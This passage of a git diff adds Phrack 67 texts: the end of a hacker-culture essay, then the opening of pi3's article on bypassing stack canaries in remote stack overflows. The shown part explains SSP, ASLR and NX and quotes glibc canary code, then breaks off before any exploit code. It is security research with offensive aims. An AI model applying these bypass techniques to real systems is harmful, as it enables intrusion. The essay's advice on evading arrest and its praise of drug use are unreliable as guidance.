+cause. As a hacker you will have to learn to live with bullshit all around
+you. It may be tough but the only important thing is to have independent
+self-esteem, not relying on the judgement of others. A good psychologist
+would even tell you that it's necessary for personal construction...
+
+                                    ~~~
+
+                      --(  Are they so special?  )--
+                             by The Analog Kid
+
+Why then are these hackers cast in such an antagonistic light by the media,
+if the contributors to journals such as Phrack are mainly thinkers? Given
+that Phrack's content is as substantial and intellectual as an academic
+journal, why is its community cast in such an antagonistic light?
+
+Morally, Phrack Inc. is in a gray area. The site itself does not engage in
+or promote illegal activity, however the information on Phrack Inc. is
+published in a very open way; Phrack Inc. does not assume responsibility
+for what the criminal underground may do with their information. More
+formal research communities would consider it moral etiquette to have 
+security holes fixed before publishing them. Phrack Inc.'s tendency to
+publish information with no forewarning is a testament to the group's
+valuation of free information and an uncontrollable side effect of its
+association with the hacking underground.
+
+Most Phrack releases have a GPG key included with the introduction [4].
+This is not a feature commonly seen in academic or professional articles.
+Functionally there is an important reason to have an encryption key, it
+allows the articles to be submitted securely (if the e-mail is intercepted
+the contents could not be read), preserving the identity of the author.
+This highlights the controversial nature of what is discussed in the hacker
+community, as well as the members' valuation of anonymity. By remaining
+anonymous they feel able to safely continue the free flow of information,
+which is the ultimate goal of Phrack Inc.
+
+The free flow of information at Phrack allows one to learn a-lot about the
+hackers who submit articles to it. Their values, their personality, and
+their intellectual curiosity is spread all throughout the articles.
+
+                                    ~~~
+
+                     --(  We are not _so_ special  )--
+                               by Antipeace
+
+Having earlier outlined my disagreement with the common beliefs, now is the
+time to share my own vision. IMHO no one is born designated to become a
+"hacker" some day. I don't know if there are predispositions (maybe our
+insane curiosity or the urge to understand things?) but I would say that
+being a hacker is essentially about acquiring a hacking mindset.
+
+Now that being said, let's see what a hacker truly is.
+
+Intellect
+---------
+
+Though movies and medias sometimes describe hackers as genius (see
+"Hackers" with the cute Angelina Jolie for example ;) who for some reason
+are shown proficient with computers, reality is a bit different.
+
+Sorry to destroy the myth but the average hacker is just an intellectual.
+Of course, there are true geniuses amongst us but the fundamental
+difference lies in the willingness to exploit our brain as much as possible
+in order to ask the essential questions as well as to find the appropriate
+answers.
+
+There is usually no need to be brilliant to impress people with hacking.
+Let me make an analogy to magicians. Even the simplest tricks are amazing
+for people who don't know how they are working. Things are the same in
+hacking. Daily life hacking is probably more about using thousands of cheap
+tricks but people are not aware of that. Since this kind of cheap hacking
+has visible consequences for the masses, hackers are falsely assumed to be
+the geniuses described in movies.
+
+Personality
+-----------
+
+Most hackers are computer 'freaks' able to spend hours in front of their
+screen in order to solve a particular problem. In a way, hackers are geeks
+and there are thousands of them.
+
+That said, it must be added that they have this unusual characteristic
+growing with time: the obsessional will to discover incoherency, mistakes
+(having impacts in security or not) in everyday life. As I said, a hacker
+is probably not smarter than you, but he/she is way more focused.
+
+What may be cool at first sight is sometimes heavy to carry. Imagine
+yourself analyzing everything. Not only is that painful for others 
+(friends, coworkers, family, lovers) to have this kind of person around but
+it can also be troublesome for you. Indeed you will sometimes be mad
+because of all these daily pieces of nonsense that ordinary people do not
+notice. Probably because of that, some hackers assume that they are smarter
+than the rest of the world, sometimes internally thinking they are some
+House-like guy, and quickly develop unfortunate ego issues which are
+discussed later.
+
+Social profile
+--------------
+
+Once again, it would be easy to draw quick conclusions based on collective
+imagery and again, there is no simple description as it's impossible to
+generalize. The social profile of individuals is a mix of both their
+personality and their evolution.
+
+Amongst the hackers I've met around the world, I can say that I've seen
+people who are:
+
+    - socially isolated / barely capable of having a proper conversation
+    - "normal" (taking into account the usual criteria)
+    - extroverts always talking to everybody everywhere they go
+
+Personally I would say that I quickly understood that a social life was
+important, not to say necessary. Having natural tendencies to be an
+introvert, I've worked with myself to reach a stable equilibrium.
+
+Note that I try as much as possible not to mix my activities and my social
+life. The reason is simple: as I said, people around me are not able to
+understand (because of the lack of technical background) nor really willing
+to understand it (because of the prejudices coming from the media). Anyway
+this is not that bad, considering the security consequences of being a
+chatterbox.
+
+                                    ~~~
+
+         --(  Why they must lurk in the shadows of anonymity  )--
+                             by The Analog Kid
+
+Those who do choose to share their information generally publish under
+anonymous aliases so as to protect their true identity. Publishing articles
+under anonymous screen names is in stark contrast to academia, where the
+goal is to have as much information published with your name as possible.
+Part of why academia admires Phrack Inc. is that by retaining anonymity,
+its members are free to discuss topics at will without concern for
+"political fallout. Some of the authors of Phrack Inc. are listed as,
+"nemo, "huku, and "BSDaemon [5]. As a case study in this anonymous
+culture, the introduction of Phrack Inc. issue 66, contains a good-bye to a
+friend: "cliph [4]. No other information is given. I inadvertently
+stumbled across the identity of this Cliph while reading an article on a
+different web-site, which stated that, "This post is dedicated to Wojciech
+"cliph Purczynski. [6]. Even with the full name available, a search for
+information yields no clues as to what became of this individual. Multiple
+tributes to the individual known as "cliph show that within the hacker
+community there is respect and recognition to the most skilled members;
+this is not different than academia.
+
+The issue of using anonymous screen names is directly confronted at the end
+of the "Malloc DES-Maleficarum article, where the author comments on a
+quote by Eric S. Raymond who criticizes the use of such false names. The
+author confronts the reader with the question, "Is there some connection
+between our name and our skills, philosophy of life or our ethics in
+hacking [7]? The author -- intending to speak for the community as a
+whole -- argues that the means by which they identity themselves is a
+result of society's judgement on computer hackers and not a reflection of
+the people. It is interesting that an American, Eric Raymond, would place
+heavy emphasis on the personal ownership of ideas, a very American value.
+The Phrack Inc. community, undoubtedly as global as the Internet within
+which it exists, shows interest in expanding knowledge and the ideas of
+others, rather than taking personal ownership of static concepts.
+
+In its layout, Phrack Inc. exhibits a much more informal nature than formal
+publications. Consider for example, the previously mentioned article
+"Malloc DES-Maleficarum. The title is a clear allusion to the Malleus
+Maleficarum, a treatise on witches published in 1486 during the inquisition
+[8]. By invoking references to witchcraft the journal is again making light
+of the negative connotations society imposes upon it. The section headings
+too are of an unconventional nature: "The House of Mind, "The House of
+Prime, "The House of Spirit, "The House of Force, "The House of Lore,
+and "The House of Underground [7]. Article 5, "Backdooring Juniper
+Firewalls, also makes reference to movies in it sections headings, with
+titles such as "Netscreen of the Dead, and "28 Hacks Later [10]. The
+references to Medieval texts and creative naming schemes demonstrates a
+level of culture and sophistication (as well as humor) within the
+community.
+
+Although the space here would not allow for such discussion, the audience
+might stop for a moment and consider what it means to be an author, and
+whether a legal name is truly required to identify a work as one's own.
+In Michael Foucault's essay, "What Is an Author?, Foucault decrees that,
+"The author function is linked to the juridical and institutional system
+that encompasses, determines, and articulates the universe of discourses
+[12]. If this statement is accurate, then the function of the author at
+Phrack Inc. is to allow the free distribution of material that might
+otherwise be censored. The raids and indictment of founding Phrack Inc.
+members discussed at the beginning show the severe role that the global
+juridical system has in directing Phrack Inc's style of discourse. If
+"institutional [12] refers to the ad hoc rules of morality and ethics
+imposed by society, then this again forces the Phrack Inc. contributors
+into an anonymous universe of discourse, as society might forsake these
+contributors. Consider how a deep and publicized knowledge of controversial
+computer hacking methods might be a black mark on the reputation of any
+programmer applying for work with a large corporation.
+
+The need to protect ones identity, and avoid public recognition for their
+discoveries, is one of the downsides that comes with being a member of the
+hacker community.
+
+                                    ~~~
+
+                 --(  The downside of a hacking life  )--
+                               by Antipeace
+
+Consider life in general. People are not always happy because they are
+bothered with random things such as the neighbor's dog always barking for
+nothing, their child having bad grades at school, etc. The modern world is
+full of stress and there is nothing to do but to bear it.
+
+Hacking certainly has cool aspects (though contrary to movies, in the end
+you won't get the girl after saving the world) but it also has side effects
+that are added to the current level of daily stress. Occasionally, you will
+be angry or anxious. You may even become paranoid at some point. This is
+mainly what I call the downside of the hacking life.
+
+The disclosure war
+------------------
+
+Well this is a hot topic. To simplify things for those who are unfamiliar,
+let's say that the hacking scene is divided in two groups of individuals:
+
+    - people publishing (or willing to publish) bugs, exploits, papers
+    - people who want to keep these things secret or at the very least
+      within the underground
+
+Though clearly belonging to the second group, I won't try to convince you
+that disclosure is bad as the arguments for both sides are valuable. I just
+choose my side. However, I can tell you how this issue may affect you or
+your friends.
+
+If you are a so called 'black hat', then there is a good chance that you
+have developed techniques or exploits based on your own discoveries. Ten
+years ago, if you were smart/skilled enough, being innovative could bring
+you new kickass tools/exploits in a matter of hours or days at the very
+least. Things are a bit different nowadays and the required time for
+giving birth has increased a lot (though virtualization and generalization
+of scripting languages helped a lot). If you consider remote exploits
+targeting C programs, it takes so much time to find and exploit bugs that
+the cost of doing so is now insane. Now imagine that you've been working on
+a particular bug for weeks / months. How would you react if some guy were
+to publish it as a full disclosure? Oh you would be angry, and you may even
+be willing to kill him. The fact that the bug may have been leaked or that
+the guy releasing may not have understood the bug properly would only
+exacerbate your feelings.
+
+The ring of trust
+-----------------
+
+What ever hacking activities you have, there is little doubt that you won't
+remain alone. Socially speaking, at some point you will try to be part of a
+community or part of a group because:
+
+    - you will want to find people able to understand what you are doing
+    - you will want to share information
+
+This will bring the unavoidable question of the amount of trust that you
+can place in fellow hackers. Ironically this is a security problem and as
+such it must be solved before exchanging anything. Practically speaking, we
+all make the same mistake at least once: we trust and we are betrayed.
+
+
+                    (---------------------------------)
+
+He that has eyes to see and ears to hear may convince himself that no
+mortal can keep a secret. If his lips are silent, he chatters with his
+fingertips; betrayal oozes out of him at every pore.
+
+                                                         Sigmund Freud
+
+                    (---------------------------------)
+
+
+Amongst the consequences of information leaks, I've personally been the
+witness of the two following sad things:
+
+    - Busts. Never forget that there may be people leaking information to
+      the government agencies amongst us. While it's true that most people
+      will unintentionally leak, some of them may be directly working for
+      the gov either because they got busted themselves and had no choice
+      but to cooperate or because they were the enemy from the very
+      beginning. Also one piece of advice, do not make the mistake of
+      assuming that your friends will be mute once caught, we're only human
+      beings.
+
+    - 0day leaks. Fortunately it happens more often than the previous case.
+      Whenever you see the price of bugs (or of the exploits), you can
+      imagine how much of a temptation it can be to sell them if you are
+      some jackass. But how would the asshole get the information?
+
+      I came up with a theory. Because of the very nature of our research,
+      I believe that the more innovative/kickass/time-consuming it is,
+      the more likely you will be to share the information with at least
+      someone else. It's just like owning some big secret that you can't
+      share with anyone. Now consider the analogy of a pebble being thrown
+      on the surface of a pond. Each time the pebble hits the surface,
+      waves propagate. If the pebble is the information then the waves
+      are the leak. One strike may induce countless waves: your 0day is
+      condemned to death.
+
+      Now a personal message for my fellow hackers. If you want to avoid
+      these pinches on your chest when your precious bugs are disclosed,
+      there is only one thing to do: stop crying over your loss and next
+      time shut the fuck up. Nothing else is working, you should know that.
+
+This trust must be placed with time. I would also recommend the GPG chain
+of trust model. It's not flawless (and far from it, believe me) but it may
+be a good alternative. It will allow you to release the tension of having
+to always keep things to yourself, and yet doing it in a 'controlled'
+way...
+
+Ego and acknowledgment
+----------------------
+
+It usually takes time to be mentally strong. No matter how smart people
+are, they will have ego issues at some point in their hacking life. The
+problem is that ego is responsible for the urge for acknowledgment that
+push people to:
+
+    - disclose security flaws & exploits
+    - publish and display themselves more than required in conferences
+    - spend time on IRC / ML explaining to the world how cool they are
+
+Don't get me wrong, this is not a complaint against disclosure. Some people
+choose to disclose bugs and/or techniques out of their own free will. This
+is their choice and I respect that. Now things are different when your mind
+is fucked because of your increasing ego.
+
+Like I said, everyone in our community is fucked at some point in his life,
+loses common sense and ends up doing stupid things. Of course, I'm no
+exception as I've done things I'm not proud of years ago. While this ego
+thing is supposed to be a short period in your life (people grow up), it
+seems that part of the security circus definitely lost itself.
+
+Drugs & alcohol
+---------------
+
+To tell you the truth I have no real explanation about our insane alcohol
+consumption. I guess this is just part of the culture. Whenever you see
+your friends, you have to drink and with time, you'll drink more and more
+often (though not as much as .pl guys, damned crazy drunken bastards ;>).
+However while your physical (kidney) tolerance increases with time, the
+vicious side effect of alcohol will remain: while drunk you will be more
+likely to leak information. My advice: if you have little control over
+yourself, do not heavily drink with unknown people.
+
+Amongst fellow hackers, most drug users that I know tried many things out
+of curiosity and a willingness to experiment, which are both part of their
+hacker nature. They also take drugs to enhance their creativity or their
+ability to concentrate. As such, drugs may have a positive impact on your
+hacking.
+
+I doubt I will ever see a hacker amongst high level athletes ;-)
+
+                                   ~~~~
+
+              --(  Of the indictment and the witch hunt  )--
+                             by The Analog Kid
+
+So then what of Phrack Inc.? If not academic or professional in nature, can
+it be dismissed as merely the mischievous work of hooligans? Certainly the
+technical expertise and respect the journal has gained within academia and
+the professional world shows that this work is not easily dismissed as
+trivial. What of its ethics then? What really is the genre and purpose of
+Phrack Inc.?
+
+On July 23, 1990 the trial of Craig Neidorf, the 19 year old pre-law
+student who founded Phrack Inc. out of a desire to exercise free speech,
+began. Neidorf was indicted on 10 felony counts carrying a maximum penalty
+of 65 years in prison, primarily related to the theft of a proprietary Bell
+South document claimed to be worth $23,000. After the defense demonstrated
+that the information Neidorf was accused of stealing could be obtained from
+Bellcore by calling a 800 number and paying a $13 fee, the government was
+forced to drop all charges to avoid utter embarrassment [11].
+
+On the surface the actions of Craig Nedorf seemed sinister and criminal in
+nature. The facts of the case however, showed the below the surface were
+innocent intentions mislabeled by the institutions of society. Although
+society may view Phrack Inc. as devious and criminal, what really lies
+behind the facade is a journal of credible intellectual material that,
+while coming from a different culture, rivals that of academia. The members
+of this community all have their own unique experiences and views and we
+can learn a lot about society and the flow of information by listening to
+what these people have to say.
+
+                                    ~~~
+
+                        --(  So in the end...  )--
+                               by Antipeace
+
+When I was a child I wanted to be one of them, I wanted to be a hacker.
+More than two decades later, not only have I finally fulfilled this dream
+but I have also gathered enough experience to analyze the impact that it
+has had on my life.
+
+Clearly it brought me a lot. Not only have I met the most fascinating
+people of my life, but it gave me this feeling that no matter how fucked
+things could be around us, I would always be able to see through it.
+
+However living a hacker's life wasn't harmless as I experimented with a few
+unpleasant things, which even now still have (minor) impacts on my life.
+Without a doubt, the more you experiment, the stronger you become. That's
+why I will never regret having chosen this path.
+
+I wrote this paper as an anonymous author (ego issues being mostly behind
+me at the time of writing) with the hope that people interested in the
+underground culture would read it. I tried to focus on the more interesting
+points. There is a lot more that could be developed as I only threw a
+few ideas around, sometimes exclusively mine, sometimes shared by fellow
+hackers and friends.
+
+                                    ~~~
+
+                         --(  A Closing Note  )--
+                             by The Analog Kid
+
+And so two stories, from two hackers, have been fused in time and presented
+to you here at Phrack Inc. We hope you learned something about the culture
+One story was written by a hacker speaking of his own life; the other was a
+story hoping to analyze the hacker culture, and Phrack's place in
+discourse, on a large scale.
+
+We hope you learned something about who these "hackers" seen in media
+references are, what they believe, and what drives them.
+
+                                    ~~~
+
+                         --(  Acknowledgments  )--
+                             by The Analog Kid
+
+First I give a tip of the hat to Rutty for teaching me how to write, and
+still teaching me to write years later. To Roadie for teaching me how to
+write, skipping town, and never teaching me how to write again. To Bearz
+for showing me how to work outside the box. And to Ziggy for condensing
+whole paragraphs of mine into single sentences. :) Without L.A. this
+paper would have lacked much of its direction, and in fact the W.C. made
+substantial contributions. Finally, thanks to al1c3_c00p3r for helping me
+to polish the final product.
+
+                                    ~~~
+
+                         --(  Acknowledgments  )--
+                               by Antipeace
+
+                             To my friends...
+           Special fuck to kingc0pe and his fellow cockroaches.
+
+                                    ~~~
+
+                           --(  References  )--
+                             by The Analog Kid
+
+[1]  Phreak_Accident. (2010, September 21) Phrack World News: Issue XXXI,
+     Part Three. [Online].
+     Available: http://phrack.org/issues.html?issue=31&id=10#article
+
+[2]  DH. (2010, September 21) Intro to Phrack 31. [Online].
+     Available: http://phrack.org/issues.html?issue=31&id=1#article
+
+[3]  W. Sturgeon. (2010, September 21) Long-lived Hacker Mag Shuts Down.
+     [Online].
+     Available: http://news.cnet.com/Long-lived-hacker-mag-shuts-down/2100-
+     7349_3-5783383.html
+
+[4]  The Circle of Lost Hackers. (2010, September 16) Introduction.
+     [Online].
+     Available: http://phrack.org/issues.html?issue=66&id=1#article
+
+[5]  (2010, September 16) Phrack Authors. [Online].
+     Available: http://phrack.org/authors.html
+
+[6]  B. Hawkes. (2010, September 19) Linux Compat Vulns (part 2). [Online].
+     Available: http://sota.gen.nz/compat2/
+
+[7]  blackngel. (2010, September 15) Malloc DES-Maleficarum. [Online].
+     Available: http://phrack.org/issues.html?issue=66&id=10#article
+
+[8]  (2010, September 18) The Malleus Maleficarum. [Online]. Available:
+     http://www.malleusmaleficarum.org/
+
+[9]  L. Highsmith. (2010, September 19) Linux Kernel Heap Tampering
+     Detection. [Online].
+     Available: http://phrack.org/issues.html?issue=66&id=15#article
+
+[10] Graeme. (2010, September 19) Netscreen of the Dead: Developing a
+     Trojaned Firmware for Juniper ScreenOS Platforms. [Online].
+     Available: http://phrack.org/issues.html?issue=66&id=5#article
+
+[11] D. Denning, "The United States Vs. Craig Neidorf: a Debate on
+     Electronic Publishing, Constitutional Rights and Hacking."
+     Communications of the ACM, 1991.
+
+[12] M. Foucault, The Foucault Reader, P. Rainbow, Ed. Vintage, 1984.
+
+[13] (2010, September 26) Phrack Magazine. [Online].
+     Available: http://phrack.org/
diff --git a/phrack67/13.txt b/phrack67/13.txt
new file mode 100644
index 0000000..33730c4
--- /dev/null
+++ b/phrack67/13.txt
@@ -0,0 +1,1877 @@
+                             ==Phrack Inc.==
+
+		Volume 0x0e, Issue 0x43, Phile #0x0d of 0x10
+
+|=-----------------------------------------------------------------------=|
+|=------=[ Scraps of notes on remote stack overflow exploitation ]=------=|
+|=-----------------------------------------------------------------------=|
+|=-------------=[ Adam 'pi3' Zabrocki - pi3 (at) itsec pl ]=-------------=|
+|=-----------------------------------------------------------------------=|
+
+
+---[ Contents
+
+1 - Introduction
+2 - Anti Exploitation Techniques
+3 - The stack cookies problem 
+  3.1 - A story of cookie protection
+  3.2 - The canary security
+  3.3 - Exploiting canaries remotely
+4 - A few words about the other protections
+5 - Hacking the PoC
+6 - Conclusion
+7 - References
+8 - Appendix - PoC 
+  8.1 - The server (s.c)
+  8.2 - The exploit (moj.c)
+
+
+---[ 1. Introduction
+
+    Before the main topic of this article starts I would like to say, this 
+paper describes a few little techniques based on small observations related
+to the POSIX standard. This observation open a small door for us to use a 
+mix of well known exploitation techniques for bypassing modern security 
+mechanisms / systems.
+
+    Nowadays, finding a stack overflow error does not imply a successful
+attack on the system. Bah! Nowadays, it is much harder, nearly impossible
+to do a remote attack. This is because of the new security patches which
+strongly increase the difficulty of exploiting bugs. We have a really
+impressive number of different kind of patches that protect against attacks
+in different layers and use different ideas. Let's look at the most popular
+and typically used ones in modern *NIX systems.
+
+
+--[ 2. Anti Exploitation Techniques
+
+
+*) AAAS (ASCII Armored Address Space)
+
+AAAS is a very interesting idea. The idea is to load libraries (and more 
+generally any ET_DYN object) in the 16 first megabytes of the address 
+space. As a result, all code and data of these shared libraries are located
+at addresses beginning with a NULL byte. It naturally breaks the 
+exploitation of the particular set of overflow bugs in which an improper 
+use of the NULL byte character leads to the corruption (for example 
+strcpy() functions and similar situations). Such a protection is 
+intrinsically not effective against situations where the NULL byte is not 
+an issue or when the return address used by the attacker does not contain a
+NULL byte (like the PLT on Linux/*BSD x86 systems). Such a protection is 
+used on Fedora distributions.
+
+*) ESP (Executable Space Protection)   
+
+The idea of this protection mechanism is very old and simple. 
+Traditionally, overflows are exploited using shellcodes which means the 
+execution of user supplied 'code' in a 'data' area. Such an unusual 
+situation is easily mitigated by preventing data sections (stack, heap, 
+.data, etc.) and more generally (if possible) all writable process memory 
+from executing. This cannot however prevent the attacker from calling 
+already loaded code such as libraries or program functions. This led to the
+classical return-into-libc family of attacks. Nowadays all PAE or 64 bits 
+x86 linux kernel are supporting this by default.
+
+*) ASLR (Address Space Layout Randomization)
+
+The idea of ASLR is to randomize the loading address of several memory 
+areas such as the program's stack and heap, or its libraries. As a result 
+even if the attacker overwrites the metadata and is able to change the 
+program flow, he doesn't know where the next instructions (shellcode, 
+library functions) are. The idea is simple and effective. ASLR is enabled 
+by default on linux kernel since linux 2.6.12.
+
+*) Stack canaries (canaries of the death)
+
+This is a compiler mechanism, in contrast to previously kernel-based 
+described techniques. When a function is called, the code inserted by the 
+compiler in its prologue stores a special value (the so-called cookie) on 
+the stack before the metadata. This value is a kind of defender of 
+sensitive data. During the epilogue the stack value is compared with the 
+original one and if they are not the same then a memory corruption must 
+have occurred. The program is then killed and this situation is reported in
+the system logs. Details about technical implementation and little arm race
+between protection and bypassing protection in this area will be explained 
+further.
+
+
+--[ 3. The stack cookies problem 
+
+--[ 3.1. A story of cookie protection
+
+There were / are many of its implementations. Some of them are better while 
+others are worse. Definitely the best implementation is SSP (Stack Smashing
+Protector), also known as ProPolice which is our topic and has been 
+included in gcc since version 4.x.
+
+How do those canaries work? At the time of creating the stack frame, the
+so-called canary is added. This is a random number. When a hacker triggers
+a stack overflow bug, before overwriting the metadata stored on the stack 
+he has to overwrite the canary. When the epilogue is called (which removes 
+the stack frame) the original canary value (stored in the TLS, referred by 
+the gs segment selector on x86) is compared to the value on the stack. If 
+these values are different SSP writes a message about the attack in the 
+system logs and terminate the program. 
+
+When a program is compiled with SSP, the stack is setup in this way:
+
+
+            |             ...             |
+            -------------------------------
+            | N - Argument for function   |
+            -------------------------------
+            | N-1 - Argument for function |
+            -------------------------------
+            |             ...             |
+            -------------------------------
+            | 2 - Argument for function   |
+            -------------------------------
+            | 1 - Argument for function   |
+            -------------------------------
+            |        Return Address       |
+            -------------------------------
+            |         Frame Pointer       |
+            -------------------------------
+            |             xxx             |
+            -------------------------------
+            |           Canary            |
+            -------------------------------
+            |       Local Variables       |
+            -------------------------------
+            |             ...             |
+ 
+
+What is an 'xxx' value? So... It is very common that gcc adds some padding 
+on the stack. In compilers of the 3.3.x and 3.4.x versions it is usually 
+20 bytes. It prevents exploiting off-by-one bugs. This article is not about
+this solution either, but we should be aware of that.
+
+The reordering issue
+--------------------
+
+Bulba and Kil3r published a technique in their phrack article [1] on how to
+bypass this security protection, if the local variables are in this kind of 
+configuration:
+
+---------------------------------------------------------------------------
+                    int func(char *arg) {
+
+                       char *ptr;
+                       char buf[MAX];
+
+                       ...
+
+                       memcpy(buf,arg,strlen(arg));
+
+                       ...
+
+                       strcpy(ptr,arg);
+
+                       ...
+
+                    }
+---------------------------------------------------------------------------
+
+In this situation we don't need to overwrite the canary value. We can 
+simply overwrite the ptr pointer with the return address. Since it's used 
+as the destination pointer of a memory copy then we can set what we want 
+and where we want (which includes the return address) without touching the 
+canary:
+
+
+                |             ...             |
+                -------------------------------
+                | arg - Argument for function |
+                -------------------------------
+          ----> |        Return Address       |
+          |     -------------------------------
+          |     |         Frame Pointer       |
+          |     -------------------------------
+          |     |             xxx             |
+          |     -------------------------------
+          |     |           Canary            |
+          |     -------------------------------
+          ----  |           char *ptr         |
+                -------------------------------
+                |        char buf[MAX-1]      |
+                -------------------------------
+                |        char buf[MAX-2]      |
+                -------------------------------
+                |             ...             |
+                -------------------------------
+                |          char buf[0]        |
+                -------------------------------
+                |             ...             |
+
+
+In this kind of situation, if an attacker can directly (or not) modify a 
+pointer, the canaries of the death may fail!
+
+In fact SSP is much more complicated and advanced than other 
+implementations of the canaries of the death (e.g. StackGuard). Indeed SSP 
+also uses some heuristic to order the local variables on the stack. 
+
+For example, imagine the following function:
+
+---------------------------------------------------------------------------
+            int func(char *arg1, char *arg2) {
+
+               int a;
+               int *b;
+               char c[10];
+               char d[3];
+
+               memcpy(c,arg1,strlen(arg1));
+               *b = 5;
+               memcpy(d,arg2,strlen(arg2));
+               return *b;
+            }
+---------------------------------------------------------------------------
+
+In theory the stack should more or less look like that:
+
+               (d[..]) (c[..]) (*b) (a) (...) (FP) (IP)
+
+But SSP changes the order of the local variables and the stack will instead
+look like this:
+
+               (*b) (a) (d[..]) (c[..]) (...) (FP) (IP)
+
+Of course SSP always adds the canary. Now the stack looks really bad from 
+the attacker's point of view:
+
+
+                |             ...             |
+                -------------------------------
+                |arg1 - Argument for function |
+                -------------------------------
+                |arg2 - Argument for function |
+                -------------------------------
+                |        Return Address       |
+                -------------------------------
+                |         Frame Pointer       |
+                -------------------------------
+                |             xxx             |
+                -------------------------------
+                |           Canary            |
+                -------------------------------
+                |           char c[..]        |
+                -------------------------------
+                |           char d[..]        |
+                -------------------------------
+                |            int a            |
+                -------------------------------
+                |            int *b           |
+                -------------------------------
+                |         Copy of arg1        |
+                -------------------------------
+                |         Copy of arg2        |
+                -------------------------------
+                |             ...             |
+
+
+SSP always tries to put all buffers close to the canary, while pointers as 
+far from the buffers as it can. The arguments of the function are also 
+copied in a special place on the stack so that the original arguments are 
+never used.
+
+With such a reordering the chances to overwrite some pointers to modify 
+the control flow seem low. It looks like an attacker doesn't have any other
+option than a mere bruteforce to exploit stack overflow bugs, does he? :)
+
+The limitations of SSP
+----------------------
+
+Even SSP is not perfect. There are some 'special' cases when SSP can't 
+create a 'safe frame'. Here are some of the known situations:
+
+*) SSP does NOT protect each buffer separately. When data on the stack is 
+   reordered in a safe way we can still overwrite the buffer by another 
+   buffer. If there are many buffers, all of them will be put close to each
+   other. We can imagine the situation when a buffer, which is before 
+   another buffer, can overwrite it. If there are data used by the 
+   application for the control flow in the overflown buffer, then a door is
+   open and depending on the program it may be possible to exploit this 
+   control.
+
+*) If we have structures or classes, SSP will NOT reorder the arguments
+   inside of this data area.
+
+*) If the function accepts a variable number of arguments (such as 
+   *printf()) then SSP will not know how many arguments to expect. In this 
+   situation the compiler will not be able to copy the arguments in a safe
+   location.
+
+*) If the program uses the alloc() function or extends the standard C 
+   language on how to create a dynamic array (e.g. char tab[size+5]) SSP 
+   will place all this data on top of the frame. People interested in
+   dynamic arrays should read andrewg's phrack paper on the subject [13].
+
+*) In most cases, when the application "plays" with virtual functions 
+   in C++, it is hard to create a 'secure frame' - for detailed
+   information please read reference [2].
+
+**) Some distributions (like Ubuntu 10.04) have a canary which is masked by
+    value 0x00FFFFFF. The NULL byte will be always there.
+
+**) StackGuard v2.0.1 always uses the static canary 0x000AFF0D. These bytes
+    weren't chosen randomly. The 0x00 byte is for stopping the copy of 
+    strings arguments. The 0x0A byte is the 'new line' and it can stop 
+    reading bytes by function like *gets(). The byte 0xFF and 0x0D ('\r') 
+    can sometimes stop copying process too. If you check the value of 
+    terminator canary generated by SSP on non system-V you will discover it
+    is almost the same. StackGuard add also the byte '\r' (0x0D) which SSP 
+    doesn't.
+
+---[ 3.2 - The canary security
+
+Beginning from the gcc version 4.1 stage2 [6], [7] the Stack Smashing
+Protector is included by default. Gcc developers reimplemented IBM Pro 
+Police Stack Detector. Let's look at its implementation under the loupe. 
+We need to determine:
+
+    *) If the canary is really random
+    *) If the address of the canary can be leaked
+
+The runtime protection
+-----------------------
+
+If we look inside a protected function we can find the following code 
+added by SSP to the epilogue:
+
+---------------------------------------------------------------------------
+0x0804841c <main+40>:   mov    -0x8(%ebp),%edx
+0x0804841f <main+43>:   xor    %gs:0x14,%edx
+0x08048426 <main+50>:   je     0x804842d <main+57>
+0x08048428 <main+52>:   call   0x8048330 <__stack_chk_fail@plt>
+---------------------------------------------------------------------------
+
+This code retrieves the local canary value from the stack and compares it
+with the original one stored in the TLS. If the values are not the same, 
+the function __stack_chk_fail() takes control. 
+
+The implementation of this function can be found in GNU C Library code in 
+file "debug/stack_chk_fail.c"
+
+---------------------------------------------------------------------------
+	#include <stdio.h>
+	#include <stdlib.h>
+	 
+	extern char **__libc_argv attribute_hidden;
+	 
+	void
+	__attribute__ ((noreturn))
+	__stack_chk_fail (void)
+	{
+	  __fortify_fail ("stack smashing detected");
+	}
+---------------------------------------------------------------------------
+
+What is important is that this function has the attribute "noreturn". That 
+means (obviously) that it never returns. Let's look deeper and see how. The
+definition of the function __fortify_fail() can be found it in file 
+"debug/fortify_fail.c"
+
+---------------------------------------------------------------------------
+	#include <stdio.h>
+	#include <stdlib.h>
+	 
+	extern char **__libc_argv attribute_hidden;
+	 
+	void
+	__attribute__ ((noreturn))
+	__fortify_fail (msg)
+	     const char *msg;
+	{
+	  /* The loop is added only to keep gcc happy.  */
+	  while (1)
+	    __libc_message (2, "*** %s ***: %s terminated\n",
+	                    msg, __libc_argv[0] ?: "<unknown>");
+	}
+	libc_hidden_def (__fortify_fail)
+---------------------------------------------------------------------------
+
+So __fortify_fail() is a wrapper around the function __libc_message() 
+which in turn calls abort(). There is indeed no way to avoid it.
+
+The initialisation
+-------------------
+
+Let's have a look at the code of the Run-Time Dynamic Linker in 
+"etc/rtld.c". The canary initialisation is performed by the function 
+security_init() which is called when the RTLD is loaded (the TLS was init
+by the init_tls() function before):
+
+---------------------------------------------------------------------------
+	static void
+	security_init (void)
+	{
+	  /* Set up the stack checker's canary.  */
+	  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard ();
+	#ifdef THREAD_SET_STACK_GUARD
+	  THREAD_SET_STACK_GUARD (stack_chk_guard);
+	#else
+	  __stack_chk_guard = stack_chk_guard;
+	#endif
+	 
+        [...] // pointer guard stuff
+	}
+---------------------------------------------------------------------------
+
+The canary value is created by the function _dl_setup_stack_chk_guard(). In
+original implementation published by IBM it was the function __guard_setup.
+
+Depending on the operating system, the function _dl_setup_stack_chk_guard()
+is either defined in file "sysdeps/unix/sysv/linux/dl-osinfo.h" or in file 
+"sysdeps/generic/dl-osinfo.h"
+
+If we go to the UNIX System V definition of the function we will find:
+
+---------------------------------------------------------------------------
+	static inline uintptr_t __attribute__ ((always_inline))
+	_dl_setup_stack_chk_guard (void)
+	{
+	  uintptr_t ret;
+	#ifdef ENABLE_STACKGUARD_RANDOMIZE
+	  int fd = __open ("/dev/urandom", O_RDONLY);
+	  if (fd >= 0)
+	    {
+	      ssize_t reslen = __read (fd, &ret, sizeof (ret));
+	      __close (fd);
+	      if (reslen == (ssize_t) sizeof (ret))
+	        return ret;
+	    }
+	#endif
+	  ret = 0;
+	  unsigned char *p = (unsigned char *) &ret;
+	  p[sizeof (ret) - 1] = 255;
+	  p[sizeof (ret) - 2] = '\n';
+	  return ret;
+	}
+---------------------------------------------------------------------------
+
+If the macro ENABLE_STACKGUARD_RANDOMIZE is enabled, the function open the 
